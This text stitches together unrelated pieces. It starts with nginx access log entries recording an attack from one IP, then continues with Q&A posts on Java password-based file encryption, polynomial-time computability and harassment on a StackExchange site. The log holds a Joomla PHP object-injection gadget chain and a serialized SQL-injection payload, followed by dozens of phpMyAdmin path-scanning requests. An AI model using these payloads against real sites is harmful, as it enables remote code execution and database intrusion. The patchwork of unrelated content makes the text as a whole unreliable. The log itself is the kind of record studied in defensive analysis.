"}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:56:\x22die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD, 218.75.30.86" [23/Mar/2020:03:29:13 +0000] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 301 178 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86" 

— Nginx Log5 —

[23/Mar/2020:03:29:13 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /pmd/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:14 +0000] "GET /pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /PMA2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /pmamy/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:15 +0000] "GET /pmamy2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /db/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:16 +0000] "GET /dbadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:17 +0000] "GET /web/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:17 +0000] "GET /admin/pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:17 +0000] "GET /admin/PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:18 +0000] "GET /admin/mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:18 +0000] "GET /admin/mysql2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:18 +0000] "GET /admin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:19 +0000] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:19 +0000] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:19 +0000] "GET /mysqladmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:19 +0000] "GET /mysql-admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:20 +0000] "GET /mysql_admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:20 +0000] "GET /phpadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:20 +0000] "GET /phpAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:21 +0000] "GET /phpmyadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:21 +0000] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:22 +0000] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:23 +0000] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:23 +0000] "GET /myadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:24 +0000] "GET /myadmin2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:25 +0000] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:25 +0000] "GET /phpMyadmin_bak/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:25 +0000] "GET /www/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:25 +0000] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:26 +0000] "GET /phpmyadmin-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:26 +0000] "GET /phpMyAdminold/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:26 +0000] "GET /phpMyAdmin.old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:27 +0000] "GET /pma-old/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:27 +0000] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:27 +0000] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:28 +0000] "GET /phpma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:28 +0000] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:28 +0000] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:28 +0000] "GET /phpMyAbmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" [23/Mar/2020:03:29:29 +0000] "GET /phpMyAdmin__/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86" 

Securely encrypt and decrypt files via PBE in Java (Jasypt seems insecure)

Requirements:

  • I have a Java app, which among other things, needs to encrypt/decrypt binary files on the file system. I’m planning to use PBE (password based encryption) since the password will be entered by the user each time they use the app (it’s not stored anywhere).
  • I don’t know if AWS KMS (key management system) or Google KMS can assist in any way, but it doesn’t matter since remote services are not allowed to be used for this project.

My Questions:

  • Are there any Java libraries that will help me achieve my requirements, aside from directly interacting with the JCE API (java cryptography extension)? I’m not a security expert and don’t want to misuse the JCE.
  • I’m also open to other ideas that don’t use a Java library, however, it must nicely integrate with my primary Java application.

Google Tink:

Tink doesn’t support PBE.

The lead developer of Tink (Thai Duong) has stated as such. Thai does say it is possible to achieve using an internal API (AesGcmJce.java), however, he goes on: “This is not recommended because the subtle layer might change without notice”. I want a stable solution, so Tink doesn’t cut it.

There is an open github issue to add PBE to Tink.


Jasypt:

Jasypt doesn’t seem secure.

If you want to know the details, read on, but it’s not required…

Jasypt is supposed to make PBE tasks easier, and the API is very simple, but the default parameter values it uses seem to be those which haven proven insecure (e.g., MD5 and DES). I can manually configure it to use more secure options but the very fact that its defaults are insecure makes me wonder what other aspects of the library are insecure.

For example, here are its default values when using the API:

  • Encryption algorithm: PBEWithMD5AndDES
  • No IV generator
  • Random salt generator of 64 bits using SHA1PRNG (java.security.SecureRandom)
  • KDF using MD5 with 1000 iterations

I can manually change the defaults to obtain the following configuration:

  • Encryption algorithm: PBEWITHSHA256AND256BITAES-CBC-BC
  • Random IV generator of 128 bits using SHA1PRNG (java.security.SecureRandom)
  • Random salt generator of 128 bits using SHA1PRNG (java.security.SecureRandom)
  • KDF using SHA256 with 1000 iterations

The API is super simple. Here’s how to instantiate the Java object which encrypts and decrypts binary data using the default settings (PBEWithMD5AndDES, etc):

StandardPBEByteEncryptor binaryEncryptor = new StandardPBEByteEncryptor(); binaryEncryptor.setPassword(password); byte[] cipherBytes = binaryEncryptor.encrypt(plainBytesArray); 

In order to make things more secure I installed a lib called Bouncy Castle which adds many cipher algorithms for use by the JVM. Among the many options I chose PBEWITHSHA256AND256BITAES-CBC-BC. Similar to the code above, here’s how I instantiated the more secure configuration:

StandardPBEByteEncryptor binaryEncryptor = new StandardPBEByteEncryptor(); binaryEncryptor.setPassword(password); binaryEncryptor.setProvider(new BouncyCastleProvider()); binaryEncryptor.setAlgorithm("PBEWITHSHA256AND256BITAES-CBC-BC"); binaryEncryptor.setIvGenerator(new RandomIvGenerator()); binaryEncryptor.setSaltGenerator(new RandomSaltGenerator()); byte[] cipherBytes = binaryEncryptor.encrypt(plainBytesArray); 

The library does have its own “stronger” encryptor classes (StrongBinaryEncryptor, AES256BinaryEncryptor, etc) but like I said, I’ve lost confidence in their software (unless you can explain otherwise).


Help:

Please help 🙂
thx

Argument in proving that function is not polynomial time in bit length of input seems faulty

I am currently solving a question that asks which of the following functions can be calculated in polynomial time:

$ $ n!, \binom{n}{5}, \binom{2n}{n}, n^{\lfloor \lg n \rfloor}, \lfloor \sqrt{n} \rfloor, \text{the smallest prime factor of } n, \text{the number of prime factors less than }n.$ $

In proving the first one, I thought $ n! \geq n$ and the input size is $ \log_2 n$ so the output cannot even be written in polynomial time. So then clearly the calculation cannot be done in polynomial time.

But then I thought I must have some misunderstanding, since by that logic even just calculating $ n$ from the input (that is, the identity function) should not be polynomial time. But that’s clearly not possible.

What is the problem in my thinking, and instead how should I be thinking about these?

How do I stop a “more senior” user, that seems to dislike my logic, from harassing every answer I give on StackExchange-RPG [migrated]

How do I stop a “more senior” user, that seems to dislike my logic, from harassing every answer I give on StackExchange-RPG?

I’m starting to feel very pushed away by certain user(s), who seem to enjoy claiming ‘I cant follow your logic”

Insinuating I’m “stupid” & trying to push me away from explaining my logic with thinly veiled “pokes”

Is there an effective way to have it delt with other than burning this account and making a new “fake-user” to escape them

Most of the issues are interpretations of RAW in DnD_5e